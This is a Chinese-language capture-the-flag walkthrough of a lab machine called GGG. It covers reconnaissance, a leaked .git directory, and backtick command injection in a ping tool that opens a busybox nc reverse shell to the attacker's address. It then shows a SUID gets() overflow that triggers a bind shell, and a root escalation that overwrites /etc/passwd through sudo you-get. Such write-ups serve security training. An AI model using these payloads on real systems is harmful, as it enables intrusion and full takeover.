lvzhouhang

群友机-GGG

  • ~9.02K 字
  1. 1. 信息搜集
  2. 2. git泄露
  3. 3. 命令执行反弹shell
  4. 4. 栈溢出提权
  5. 5. 提权root

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27:66:64:96       PCS Systemtechnik GmbH
192.168.31.229  08:00:27:26:da:52       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.385 seconds (107.34 hosts/sec). 3 responded

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.229
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-14 03:25 EDT
Nmap scan report for 192.168.31.229
Host is up (0.0019s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:26:DA:52 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds

git泄露

80端口是一个用js写的管理系统,账号密码都写在前端

1
2
const CORRECT_USERNAME = 'welcome';
const CORRECT_PASSWORD = 'ThisIsMypasword';

登陆后有一个假的文件上传还有一个邮箱admin@ggg.dsz。扫描目录可以扫到一个.git

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(root㉿kali)-[~/Desktop/script/gitTools-v0.0.1/Dumper]
└─# ./gitdumper.sh "http://192.168.31.229/.git/" clone
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating clone/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/29/efa9b064a5321e124e46dd1b8b1da23151c093
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/bc/363f583ae4fd3e76c26f0c74d179de9052cea4
[+] Downloaded: objects/e8/279ccefbaad9c6454a9395170f87c9cf085534
[+] Downloaded: objects/32/b8aa6a468f5fd587a8e7d5b1fc64582328c78d
[+] Downloaded: objects/4b/825dc642cb6eb9a060e54bf8d69288fbee4904
[+] Downloaded: objects/2d/ce93ea08ed9059be0a838c6bcf62b7b5c28907
[+] Downloaded: objects/ea/dc848545bf75cbf77c71ba707f5498a470af93
[+] Downloaded: objects/90/15a7a32ca0681be64471d3ac2f8c1f24c1040d
[+] Downloaded: objects/87/3d342b871aa76d8d9cddf9716126c14e51ce80

git log可以看到还有一个域名gggbaby.ggg.dsz

1
2
3
4
5
6
7
┌──(root㉿kali)-[~/…/script/gitTools-v0.0.1/Dumper/clone]
└─# git log
commit 29efa9b064a5321e124e46dd1b8b1da23151c093 (HEAD -> master)
Author: root <root@gggbaby.ggg.dsz>
Date:   Fri Jun 13 20:45:56 2025 -0400

    rm index.html

ggg.dszgggbaby.ggg.dsz添加进hosts里,访问gggbaby.ggg.dsz还是一个管理系统。

命令执行反弹shell

用泄露的密码登录,多了一个网络诊断工具。老演员了,拼接分号什么的都不行,后面应该有过滤的东西

1
127.0.0.1;`busybox nc 192.168.31.129 4444 -e /bin/bash`

用这个可以弹出来shell,查看network-test.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php
header('Content-Type: text/plain');

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $data = json_decode(file_get_contents('php://input'), true);
    $host = $data['host'] ?? '';

    if (!empty($host)) {
        $filtered = filter_dangerous_chars($host);

        if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
            $command = "ping -n 4 \"$filtered\"";
        } else {
            $command = "ping -c 4 \"$filtered\"";
        }

        $output = shell_exec($command);

        if ($output === null) {
            echo "执行命令时出错";
        } else {
            echo $output;
        }
    } else {
        echo "主机地址不能为空";
    }
} else {
    echo "无效的请求方法";
}

// 过滤函数:移除所有危险字符,但故意保留反引号
function filter_dangerous_chars($input) {
    $dangerous = array(
        ';', '&', '|', '$', '<', '>', '{', '}',
        '[', ']', '(', ')', '#', '%', '!', '\\',
        '\'', '"', chr(0), chr(10), chr(13)
    );
    return str_replace($dangerous, '', $input);
}
?>

他将这些字符全部替换为空了,但是反引号没有过滤,他是通过拼接字符串用shell_exec来执行的命令,shell_exec允许开发者通过 shell 执行命令。所以拼接上反引号,shell会先执行反引号里面的命令,然后将命令执行的结果再拼接执行。

就像这样:

栈溢出提权

/opt目录下有一个带有suid权限的可执行文件,还有他的源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
www-data@GGG:/opt$ ls -al
ls -al
total 32
drwxr-xr-x  2 root root  4096 Jun 13 22:04 .
drwxr-xr-x 18 root root  4096 Mar 18 20:37 ..
-rw-r--r--  1 root root   552 Jun 13 22:04 demo.c
-rwsr-sr-x  1 root root 16792 Jun 13 22:04 shell_launcher
www-data@GGG:/opt$ cat demo.c
cat demo.c
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void execute_shell() {
    system("busybox nc -lp 1234 -e /bin/bash");
}
int main(int argc, char *argv[]) {
    setuid(1000);
    setgid(1000);
    char name[60];
    int execute = 0;
    printf("Enter your name: ");
    fflush(stdout);
    gets(name);
    printf("Hello, %s!\n", name);
    if (execute == 0xABCD1234) {
        printf("Launching shell...\n");
        execute_shell();
    } else {
        printf("flag is 0x%X\n", execute);
    }
    return 0;
}

覆盖60个垃圾数据,然后加上\x34\x12\xCD\xAB就可以将execute覆盖成0xABCD1234了,覆盖成功后他会用/bin/bash监听一个1234端口,nc连接

1
2
3
4
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nc 192.168.31.229 1234
id
uid=1000(anjv) gid=33(www-data) groups=33(www-data)

写一个公钥进去,然后ssh连接

提权root

1
2
3
4
5
6
anjv@GGG:~$ sudo -l
Matching Defaults entries for anjv on GGG:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User anjv may run the following commands on GGG:
    (ALL) NOPASSWD: /usr/local/bin/you-get

You-Get 是一个用于下载多种音视频媒体资源的 Python 爬虫程序。相当于可以写入任意文件了,将/etc/passwd覆盖掉

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
anjv:x:1000:1000:,,,:/home/anjv:/bin/bash
ll:$1$Zg12rJZk$P7IV1RqAT005RKjprDSo41:0:0:root:/root:/bin/bash
┌──(root㉿kali)-[~/Desktop/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
anjv@GGG:~$ sudo  /usr/local/bin/you-get 192.168.31.129/passwd -O /etc/passwd
you-get: Skipping /etc/passwd: file already exists
Site:       168.31.129
Title:      passwd
Type:       Unknown type (None)
Size:       0.0 MiB (1451 Bytes)


anjv@GGG:~$ sudo  /usr/local/bin/you-get 192.168.31.129/passwd -O /etc/passwd  -f
Site:       168.31.129
Title:      passwd
Type:       Unknown type (None)
Size:       0.0 MiB (1451 Bytes)

Downloading /etc/passwd ...
0.0% (  0.0/  0.0MB) ├────────────────────────────────────────────────────────────────────────────────┤[1/1]
File with this name already exists. Overwrite? (y/N) y
you-get: Overwriting passwd ...
100% (  0.0/  0.0MB) ├████████████████████████████████████████████████████████████████████████████████┤[1/1]    1 kB/s
anjv@GGG:~$ su ll
Password:
root@GGG:/home/anjv# id
uid=0(root) gid=0(root) groups=0(root)
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
赞助喵
非常感谢您的喜欢!
赞助喵
分享这一刻
让朋友们也来瞅瞅!